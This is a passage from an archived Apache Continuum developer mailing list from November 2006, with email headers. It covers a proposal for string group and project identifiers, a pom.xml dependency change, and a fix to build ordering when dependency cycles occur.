projectIds for the same projects in > those groups, and then distinguish between them by the group they are > a member of. this is because I think it would be annoying as sin to > load up Doxia and make a DoxiaCore project in it, and then load up a > DoxiaBranchFoo and have to name the DoxiaCore something like > DoxiaCoreBranch just to make it unique. > > is that clearer? > > jesse > > p.s. great feedback, thanks > > > On 11/4/06, Christian Edward Gruber <[email protected]> wrote: >> Cool, more comment in-line. >> >> Jesse McConnell wrote: >> > On 11/4/06, Christian Edward Gruber <[email protected]> wrote: >> >> To that end, also, I think that the projects should still have an >> >> internal primary key that's integer based, but that (continuum) >> >> groupId+projectId should be an alternate "business key" for the >> >> integerId. This, of course, to avoid craziness between multiple >> copies >> >> of project groups. >> > >> > right, the Project already has an id which is integer and is the store >> > key for that object, I am proposing here that we stop using these >> > internal store id's all over the place in the UI and other code. and >> > your right, groupId + projectId (the string short names) would be the >> > business key for this, they would together be unique always. I think >> > projectId could be shared across multiple groups though, so to get a >> > particular one of those you would need to know the groupId to get it >> > from. >> Meh. I'm not a fan of compound-primary-keys, except on join tables, or >> when you really have to. If these projectIds are surrogate keys, then >> they should be unique, with a foreign-key to groupId to maintain the >> strong relationship. Joins get torturous (and more expensive) when you >> have compound primary keys, and the further out your join-tables, the >> more times you replicate several keys. If we're separating surrogate >> keys from business keys, then let's keep single unique surrogate keys as >> primary keys, and leave the composite stuff for business keys. Just my >> opinionated view... :) >> >> Christian >> -- >> >> *christian** gruber + process coach and architect* >> >> *Israfil Consulting Services Corporation* >> >> *email** [email protected] + bus 475-205-1887 + mob 475-205-1887* >> >> >> > > -- *christian** gruber + process coach and architect* *Israfil Consulting Services Corporation* *email** [email protected] + bus 475-205-1887 + mob 475-205-1887* --------------070405070506040509070806-- From [email protected] Mon Nov 06 04:22:29 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 33638 invoked from network); 6 Nov 2006 04:22:28 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Nov 2006 04:22:28 -0000 Received: (qmail 19061 invoked by uid 500); 6 Nov 2006 04:22:39 -0000 Delivered-To: [email protected] Received: (qmail 19036 invoked by uid 500); 6 Nov 2006 04:22:39 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 19024 invoked by uid 99); 6 Nov 2006 04:22:39 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 05 Nov 2006 20:22:39 -0800 X-ASF-Spam-Status: No, hits=1.4 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (herse.apache.org: 161.129.204.104 is neither permitted nor denied by domain of [email protected]) Received: from [161.129.204.104] (HELO geronimo.freeparking.co.nz) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 05 Nov 2006 20:22:26 -0800 Received: from [161.129.204.104] (222-155-212-88.jetstream.xtra.co.nz [161.129.204.104]) (authenticated) by geronimo.freeparking.co.nz (8.10.2/8.10.2) with ESMTP id kA64M1N22032 for <[email protected]>; Mon, 6 Nov 2006 17:22:01 +1300 Message-ID: <[email protected]> Date: Mon, 06 Nov 2006 17:22:00 +1300 From: Rahul Thakur <[email protected]> User-Agent: Thunderbird 161.129.204.104 (Windows/20060909) MIME-Version: 1.0 To: [email protected] Subject: Re: project group shortcuts References: <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=UTF-8; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org Yep, this would be a nice improvement to look forward to from a usability perspective! While I can imagine generating suggestions for GroupId values for new M1 and M2 projects being added, I am not sure how we could come up with something similar for Shell or Ant projects. Cheers, Rahul Jesse McConnell wrote: > Ok, I am going to try this out I think, here is a laundry list of what > would happen followed by the benefits. > > * the id on project group and project classes usage is deprecated and > goes back to being internal to the store, nothing references to a > project or a group by 0,1,2,3 etc anymore. > > * groupId on the project group class becomes the unique string by > which you access a project group, it is currently kinda floating > around usage wise as sometimes the groupId from the pom loaded up on > m2 projects > * projectId is added to Project and is the unique string by which you > refer to a project in a project group > > * groupId and projectId would be restricted to [a-zA-Z0-9.-] with no > spaces and are the short names to refer to these group and project > objects on the UI layer and everywhere else in continuum > > * cascading effects throughout a large chunk of continuum as the > integer projectId and the freeform strings for projectGroupName and > integer projectGroupId are deprecated and converted to the short > names. > > benefits: > > * UI layer will standardize on how to refer to project groups and > projects in those groups, without passing around internal jdo store > identifiers, free form text strings or even the combination of both of > those in some cases (this is a failing of mine from the project group > refactor I did, it made the UI work clunkier in referring to these > things) > > * by treating m1/ant/shell/m2 projects the same in the UI it should > alleviate a ton of oddball UI issues that are cropping up where groups > are created, not created, not referred to correctly, names not being > passed around between linked actions, etc > > * following a convention for naming your groups and projects across > instances of continuum will make clustering a lot easier, group 7 on > this instance isn't necessarily group 7 in that instance > > * specifying the string group Id that you will refer to that group by > on the adding of the project will allow you to load up multiple > instances of the same project (ex one instance on trunk and one on a > branch) into the same instance of continuum (versions in the poms for > m2 should lets these play together nicely), right now I think the > projects from that second addition will just add into the same project > group unless you rename the name in the pom you are loading > > * the unique string project Id can be the same for the same project > across multiple usages of that project in different groups, letting > you refer to them as [Doxia/DoxiaCore] and [Doxia1.2/DoxiaCore] > > * m1/shell/m2/ant project groups are referred to in the exact same > way, and get their values from the same source, on the adding of the > group and underlying projects > > * we can have a GroupNamingMapper and ProjectNamingMapper interface > that can be configurable to be used in the automatic generation of the > string groupId and projectId so this naming process can be automated > by following a convention in the naming of the poms for m2 > > * the groupId and projectId string values can be edited at any time, > letting the user load up the Doxia group and then later change it to > the DoxiaTrunk group and then add in a DoxiaBranchFoo group > > I am sure there are other benefits, but these are the ones that keep > pointing me in this direction. I just think that we really need to > take a step like this to clean up a lot of messy interactions between > the UI layer and continuum core and the confusing mishmash of webwork > action linkages involving groups and projects. > > anyone have any thoughts on this? I am pretty sure I can have this > all done in a couple of days of work and I really think it will help > maintenance and future development. > > jesse > > > On 10/30/06, Jesse McConnell <[email protected]> wrote: >> >> last week I mentioned this in rahul's zero-conf mail >> >> > if this is really what we want to change here then perhaps we ought to >> > make it an option for configuration of the project group in all cases, >> > the ability to specify the name of the project group...or give it some >> > kinda short identification element. I kinda like that idea, then we >> > can use 'Doxia' for 'The Doxia Project' and we can even use the short >> > user input project group Id in the urls... >> > >> >> to do this I would put a textfield on the project group creation >> screens and >> then an edittable one in the project config screens, and add it to the >> model. This shortcut would replace the locations where the >> projectGroupName >> is currently being passed around on actions to let projects know what >> group >> is being interacted with. Api changes obviously to support this as >> well, >> but I don't think this would be too terribly bad to get into place. >> We get >> to avoid passing around the jdo projectGroupId values which might get >> screwy >> with clustering if we have different stores and the project groups >> are not >> in sync. >> >> We would also be able to do some mapping to allow for direct url >> friendly >> linking to the summary pages >> >> http://ci.goo.org:9090/Doxia which would go to the groupSummary page >> for the >> Doxia project. >> >> Does anyone have any objections to adding this functionality? It would >> clean up the interactions for the webwork actions dealing with >> project names >> (having "The Doxia Project" passed around on the url's is kinda >> chintz) not >> to mention allow the m1/m2/ant/shell project groups have a consistent >> way to >> referring to the project group concept. I can see a lot of bonuses >> and no >> downsides right now...I think it will clean up a lot of different >> interactions. >> >> jesse >> >> -- >> jesse mcconnell >> [email protected] >> > > From [email protected] Mon Nov 06 05:20:24 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 44042 invoked from network); 6 Nov 2006 05:20:24 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Nov 2006 05:20:24 -0000 Received: (qmail 70554 invoked by uid 500); 6 Nov 2006 05:20:35 -0000 Delivered-To: [email protected] Received: (qmail 70533 invoked by uid 500); 6 Nov 2006 05:20:35 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 70522 invoked by uid 99); 6 Nov 2006 05:20:35 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 05 Nov 2006 21:20:35 -0800 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO smtp2.israfil.net) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 05 Nov 2006 21:20:22 -0800 Received: from [161.129.204.104] (unknown [161.129.204.104]) (using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits)) (No client certificate requested) by smtp2.israfil.net (Postfix) with ESMTP id 26CBFAD43CA for <[email protected]>; Mon, 6 Nov 2006 00:37:39 -0500 (EST) Message-ID: <[email protected]> Date: Mon, 06 Nov 2006 00:19:38 -0500 From: Christian Edward Gruber <[email protected]> Organization: Israfil Consulting Services Corporation User-Agent: Thunderbird 161.129.204.104 (Windows/20060909) MIME-Version: 1.0 To: [email protected] Subject: Re: project group shortcuts References: <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: multipart/alternative; boundary="------------060805050801090609080200" X-Virus-Checked: Checked by ClamAV on apache.org --------------060805050801090609080200 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 7bit I think that for Shell and Ant projects, they'll need to be specified [email protected]. Christian. Rahul Thakur wrote: > > Yep, this would be a nice improvement to look forward to from a > usability perspective! > > While I can imagine generating suggestions for GroupId values for new > M1 and M2 projects being added, I am not sure how we could come up > with something similar for Shell or Ant projects. > > Cheers, > Rahul > -- *christian** gruber + process coach and architect* *Israfil Consulting Services Corporation* *email** [email protected] + bus 475-205-1887 + mob 475-205-1887* --------------060805050801090609080200-- From [email protected] Tue Nov 07 21:14:52 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 47077 invoked from network); 7 Nov 2006 21:14:52 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 7 Nov 2006 21:14:52 -0000 Received: (qmail 10822 invoked by uid 500); 7 Nov 2006 21:15:03 -0000 Delivered-To: [email protected] Received: (qmail 10734 invoked by uid 500); 7 Nov 2006 21:15:02 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 10723 invoked by uid 99); 7 Nov 2006 21:15:02 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 07 Nov 2006 13:15:02 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO webmail9.amenworld.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Tue, 07 Nov 2006 13:14:47 -0800 Received: (qmail 22790 invoked from network); 7 Nov 2006 21:14:27 -0000 Received: from unknown (HELO ?161.129.204.104?) (161.129.204.104) by 0 with SMTP; 7 Nov 2006 21:14:27 -0000 Message-ID: <[email protected]> Date: Tue, 07 Nov 2006 22:14:19 +0100 From: Emmanuel Venisse <[email protected]> User-Agent: Thunderbird 161.129.204.104 (Windows/20060909) MIME-Version: 1.0 To: [email protected] Subject: Re: svn commit: r471967 - /maven/continuum/trunk/continuum-rpc-client/pom.xml References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=UTF-8; format=flowed Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org Carlos, I'm not sure it's correct. If you use continuum-model, you use java classes enhanced by jpox Emmanuel [email protected] a écrit : > Author: carlos > Date: Mon Nov 6 18:12:00 2006 > New Revision: 471967 > > URL: http://svn.apache.org/viewvc?view=rev&rev=471967 > Log: > Don't rebuild model and depend on binary > > Modified: > maven/continuum/trunk/continuum-rpc-client/pom.xml > > Modified: maven/continuum/trunk/continuum-rpc-client/pom.xml > URL: http://svn.apache.org/viewvc/maven/continuum/trunk/continuum-rpc-client/pom.xml?view=diff&rev=471967&r1=471966&r2=471967 > ============================================================================== > --- maven/continuum/trunk/continuum-rpc-client/pom.xml (original) > +++ maven/continuum/trunk/continuum-rpc-client/pom.xml Mon Nov 6 18:12:00 2006 > @@ -14,22 +14,6 @@ > <build> > <plugins> > <plugin> > - <groupId>org.codehaus.modello</groupId> > - <artifactId>modello-maven-plugin</artifactId> > - <executions> > - <execution> > - <goals> > - <goal>java</goal> > - </goals> > - </execution> > - </executions> > - <configuration> > - <version>1.0.0</version> > - <packageWithVersion>false</packageWithVersion> > - <model>../continuum-model/src/main/mdo/continuum.xml</model> > - </configuration> > - </plugin> > - <plugin> > <groupId>org.codehaus.mojo</groupId> > <artifactId>exec-maven-plugin</artifactId> > <configuration> > @@ -42,6 +26,11 @@ > </plugins> > </build> > <dependencies> > + <dependency> > + <groupId>org.apache.maven.continuum</groupId> > + <artifactId>continuum-model</artifactId> > + <version>${project.version}</version> > + </dependency> > <dependency> > <groupId>xmlrpc</groupId> > <artifactId>xmlrpc</artifactId> > > > > > From [email protected] Tue Nov 07 21:16:53 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 47869 invoked from network); 7 Nov 2006 21:16:51 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 7 Nov 2006 21:16:51 -0000 Received: (qmail 19061 invoked by uid 500); 7 Nov 2006 21:17:01 -0000 Delivered-To: [email protected] Received: (qmail 19043 invoked by uid 500); 7 Nov 2006 21:17:01 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 19032 invoked by uid 99); 7 Nov 2006 21:17:01 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 07 Nov 2006 13:17:01 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO webmail9.amenworld.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Tue, 07 Nov 2006 13:16:47 -0800 Received: (qmail 24434 invoked from network); 7 Nov 2006 21:16:27 -0000 Received: from unknown (HELO ?161.129.204.104?) (161.129.204.104) by 0 with SMTP; 7 Nov 2006 21:16:27 -0000 Message-ID: <[email protected]> Date: Tue, 07 Nov 2006 22:16:20 +0100 From: Emmanuel Venisse <[email protected]> User-Agent: Thunderbird 161.129.204.104 (Windows/20060909) MIME-Version: 1.0 To: [email protected] Subject: Re: svn commit: r472221 - /maven/continuum/trunk/continuum-core/src/main/java/org/apache/maven/continuum/DefaultContinuum.java References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=UTF-8; format=flowed Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org Jesse, Is it possible to sort projects in the group instead of build them in the wrong order? I think it would be a better solution. Emmanuel [email protected] a écrit : > Author: jmcconnell > Date: Tue Nov 7 11:35:42 2006 > New Revision: 472221 > > URL: http://svn.apache.org/viewvc?view=rev&rev=472221 > Log: > if there is a cycle detected on a scheduled build of a project group then all projects would be built unordered, no just the projects in that project group, so fix it so that only those projects in that project group would be built unsorted > > Modified: > maven/continuum/trunk/continuum-core/src/main/java/org/apache/maven/continuum/DefaultContinuum.java > > Modified: maven/continuum/trunk/continuum-core/src/main/java/org/apache/maven/continuum/DefaultContinuum.java > URL: http://svn.apache.org/viewvc/maven/continuum/trunk/continuum-core/src/main/java/org/apache/maven/continuum/DefaultContinuum.java?view=diff&rev=472221&r1=472220&r2=472221 > ============================================================================== > --- maven/continuum/trunk/continuum-core/src/main/java/org/apache/maven/continuum/DefaultContinuum.java (original) > +++ maven/continuum/trunk/continuum-core/src/main/java/org/apache/maven/continuum/DefaultContinuum.java Tue Nov 7 11:35:42 2006 > @@ -539,9 +539,12 @@ > > Map projectGroupsMap = null; > > + // get the Maps of id's that are effected by this schedule > try > { > - // todo the store should get cleaned up some so this isn't as clunky, I think the store should be able to return all of these info > + // todo the store should get cleaned up some so this isn't as clunky, > + // todo I think the store should be able to return all of these info > + > projectsMap = store.getProjectIdsAndBuildDefinitionsIdsBySchedule( schedule.getId() ); > > projectGroupsMap = store.getProjectGroupIdsAndBuildDefinitionsIdsBySchedule( schedule.getId() ); > @@ -560,10 +563,13 @@ > > Collection projectGroups = getAllProjectGroupsWithProjects(); > > + // walk through all of the project groups > for ( Iterator i = projectGroups.iterator(); i.hasNext(); ) > { > + // get the project group > ProjectGroup projectGroup = (ProjectGroup) i.next(); > > + // get all the sorted projects in a project group > try > { > projectsList = getProjectsInBuildOrder( store.getProjectsWithDependenciesByGroupId( projectGroup.getId() ) ); > @@ -573,13 +579,15 @@ > getLogger().warn( > "Cycle detected while sorting projects for building, falling back to unsorted build." ); > > - projectsList = getProjects(); > + projectsList = getProjectsInGroup( projectGroup.getId() ); > } > > getLogger().info( "Building " + projectsList.size() + " projects" ); > > + // get the group build definitions associated with this project group > List groupBuildDefinitionIds = (List) projectGroupsMap.get( new Integer( projectGroup.getId() ) ); > > + // iterate through the sorted (or potentially unsorted) projects in this project group > for ( Iterator j = projectsList.iterator(); j.hasNext(); ) > { > Project project = (Project) j.next(); > > > > > From [email protected] Tue Nov 07 21:18:06 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 48766 invoked from network); 7 Nov 2006 21:18:06 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 7 Nov 2006 21:18:06 -0000 Received: (qmail 24032 invoked by uid 500); 7 Nov 2006 21:18:17 -0000 Delivered-To: [email protected] Received: (qmail 24002 invoked by uid 500); 7 Nov 2006 21:18:17 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 23991 invoked by uid 99); 7 Nov 2006 21:18:17 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 07 Nov 2006 13:18:17 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO ug-out-1314.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 07 Nov 2006 13:18:03 -0800 Received: by ug-out-1314.google.com with SMTP id j40so1176405ugd for <[email protected]>; Tue, 07 Nov 2006 13:17:41 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:sender:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references:x-google-sender-auth; b=TmN6FyXeWIzrMHqihFXn60aqMFZG/K8gbp6FbyxjJ1eW7PzWVJlIXLezhYcH0Bn0XPTub6dXYooq4HlXnnBq4BCBl54JXQpUFMLRA1HsmHB9K38n9RxTmVcF75yi2K0zAkVNxgWEnnN2VF+KPvE+BdjhGv2RmZsqM5IwJOeDGrg= Received: by 161.129.204.104 with SMTP id v16mr1601245buc.1162934260642; Tue, 07 Nov 2006 13:17:40 -0800 (PST) Received: by 161.129.204.104 with HTTP; Tue, 7 Nov 2006 13:17:40 -0800 (PST) Message-ID: <[email protected]> Date: Tue, 7 Nov 2006 13:17:40 -0800 From: "Carlos Sanchez" <[email protected]> Sender: [email protected] To: [email protected] Subject: Re: svn commit: r471967 - /maven/continuum/trunk/continuum-rpc-client/pom.xml In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: quoted-printable Content-Disposition: inline References: <[email protected]> <[email protected]> X-Google-Sender-Auth: 3a63cf3663805986 X-Virus-Checked: Checked by ClamAV on apache.org ok, then we'll probably need continuum-model and continuum-model-jpox, agre= e ? On 11/7/06, Emmanuel Venisse <[email protected]> wrote: > Carlos, > > I'm not sure it's correct. If you use continuum-model, you use java class= es enhanced by jpox > > Emmanuel > > [email protected] a =E9crit : > > Author: carlos > > Date: Mon Nov 6 18:12:00 2006 > > New Revision: 471967 > > > > URL: http://svn.apache.org/viewvc?view=3Drev&rev=3D471967 > > Log: > > Don't rebuild model and depend on binary > > > > Modified: > > maven/continuum/trunk/continuum-rpc-client/pom.xml > > > > Modified: maven/continuum/trunk/continuum-rpc-client/pom.xml > > URL: http://svn.apache.org/viewvc/maven/continuum/trunk/continuum-rpc-c= lient/pom.xml?view=3Ddiff&rev=3D471967&r1=3D471966&r2=3D471967 > > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D > > --- maven/continuum/trunk/continuum-rpc-client/pom.xml (original) > > +++ maven/continuum/trunk/continuum-rpc-client/pom.xml Mon Nov 6 18:12= :00 2006 > > @@ -14,22 +14,6 @@ > > <build> > > <plugins> > > <plugin> > > - <groupId>org.codehaus.modello</groupId> > > - <artifactId>modello-maven-plugin</artifactId> > > - <executions> > > - <execution> > > - <goals> > > - <goal>java</goal> > > - </goals> > > - </execution> > > - </executions> > > - <configuration> > > - <version>1.0.0</version> > > - <packageWithVersion>false</packageWithVersion> > > - <model>../continuum-model/src/main/mdo/continuum.xml</model> > > - </configuration> > > - </plugin> > > - <plugin> > > <groupId>org.codehaus.mojo</groupId> > > <artifactId>exec-maven-plugin</artifactId> > > <configuration> > > @@ -42,6 +26,11 @@ > > </plugins> > > </build> > > <dependencies> > > + <dependency> > > + <groupId>org.apache.maven.continuum</groupId> > > + <artifactId>continuum-model</artifactId> > > + <version>${project.version}</version> > > + </dependency> > > <dependency> > > <groupId>xmlrpc</groupId> > > <artifactId>xmlrpc</artifactId> > > > > > > > > > > > > --=20 I could give you my word as a Spaniard. No good. I've known too many Spaniards. -- The Princess Bride From [email protected] Tue Nov 07 21:31:54 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 54526 invoked from network); 7 Nov 2006 21:31:53 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 7 Nov 2006 21:31:53 -0000 Received: (qmail 63839 invoked by uid 500); 7 Nov 2006 21:32:04 -0000 Delivered-To: [email protected] Received: (qmail 63820 invoked by uid 500); 7 Nov 2006 21:32:04 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 63809 invoked by uid 99); 7 Nov 2006 21:32:04 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 07 Nov 2006 13:32:04 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO webmail9.amenworld.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Tue, 07 Nov 2006 13:31:49 -0800 Received: (qmail 2120 invoked from network); 7 Nov 2006 21:31:29 -0000 Received: from unknown (HELO ?161.129.204.104?) (161.129.204.104) by 0 with SMTP; 7 Nov 2006 21:31:29 -0000 Message-ID: <[email protected]> Date: Tue, 07 Nov 2006 22:31:15 +0100 From: Emmanuel Venisse <[email protected]> User-Agent: Thunderbird 161.129.204.104 (Windows/20060909) MIME-Version: 1.0 To: [email protected] Subject: Re: svn commit: r471967 - /maven/continuum/trunk/continuum-rpc-client/pom.xml References: <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org I'm agree, but I'm not sure it will be used elsewhere that rpc-client Carlos Sanchez a écrit : > ok, then we'll probably need continuum-model and continuum-model-jpox, > agree ? > > On 11/7/06, Emmanuel Venisse <[email protected]> wrote: >> Carlos, >> >> I'm not sure it's correct. If you use continuum-model, you use java >> classes enhanced by jpox >> >> Emmanuel >> >> [email protected] a écrit : >> > Author: carlos >> > Date: Mon Nov 6 18:12:00 2006 >> > New Revision: 471967 >> > >> > URL: http://svn.apache.org/viewvc?view=rev&rev=471967 >> > Log: >> > Don't rebuild model and depend on binary >> > >> > Modified: >> > maven/continuum/trunk/continuum-rpc-client/pom.xml >> > >> > Modified: maven/continuum/trunk/continuum-rpc-client/pom.xml >> > URL: >> http://svn.apache.org/viewvc/maven/continuum/trunk/continuum-rpc-client/pom.xml?view=diff&rev=471967&r1=471966&r2=471967 >> >> > >> ============================================================================== >> >> > --- maven/continuum/trunk/continuum-rpc-client/pom.xml (original) >> > +++ maven/continuum/trunk/continuum-rpc-client/pom.xml Mon Nov 6 >> 18:12:00 2006 >> > @@ -14,22 +14,6 @@ >> > <build> >> > <plugins> >> > <plugin> >> > - <groupId>org.codehaus.modello</groupId> >> > - <artifactId>modello-maven-plugin</artifactId> >> > - <executions> >> > - <execution> >> > - <goals> >> > - <goal>java</goal> >> > - </goals> >> > - </execution> >> > - </executions> >> > - <configuration> >> > - <version>1.0.0</version> >> > - <packageWithVersion>false</packageWithVersion> >> > - <model>../continuum-model/src/main/mdo/continuum.xml</model> >> > - </configuration> >> > - </plugin> >> > - <plugin> >> > <groupId>org.codehaus.mojo</groupId> >> > <artifactId>exec-maven-plugin</artifactId> >> > <configuration> >> > @@ -42,6 +26,11 @@ >> > </plugins> >> > </build> >> > <dependencies> >> > + <dependency> >> > + <groupId>org.apache.maven.continuum</groupId> >> > + <artifactId>continuum-model</artifactId> >> > + <version>${project.version}</version> >> > + </dependency> >> > <dependency> >> > <groupId>xmlrpc</groupId> >> > <artifactId>xmlrpc</artifactId> >> > >> > >> > >> > >> > >> >> > > From [email protected] Tue Nov 07 21:43:26 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 60191 invoked from network); 7 Nov 2006 21:43:22 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 7 Nov 2006 21:43:22 -0000 Received: (qmail 78874 invoked by uid 500); 7 Nov 2006 21:43:33 -0000 Delivered-To: [email protected] Received: (qmail 78854 invoked by uid 500); 7 Nov 2006 21:43:33 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 78843 invoked by uid 99); 7 Nov 2006 21:43:33 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 07 Nov 2006 13:43:32 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO mvdb.net) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Tue, 07 Nov 2006 13:43:16 -0800 Received: (qmail 12000 invoked from network); 7 Nov 2006 21:42:53 -0000 Received: from unknown (HELO [161.129.204.104]) (161.129.204.104) by 161.129.204.104 with SMTP; Tue, 07 Nov 2006 21:42:53 +0000 Message-ID: <[email protected]> Date: Tue, 07 Nov 2006 22:42:53 +0100 From: Martin van den Bemt <[email protected]> User-Agent: Thunderbird 161.129.204.104 (X11/20060915) MIME-Version: 1.0 To: [email protected] Subject: Re: svn commit: r471967 - /maven/continuum/trunk/continuum-rpc-client/pom.xml References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org It is... Mvgr, Martin Emmanuel Venisse wrote: > I'm agree, but I'm not sure it will be used elsewhere that rpc-client > > Carlos Sanchez a écrit : >> ok, then we'll probably need continuum-model and continuum-model-jpox, >> agree ? >> >> On 11/7/06, Emmanuel Venisse <[email protected]> wrote: >>> Carlos, >>> >>> I'm not sure it's correct. If you use continuum-model, you use java >>> classes enhanced by jpox >>> >>> Emmanuel >>> >>> [email protected] a écrit : >>> > Author: carlos 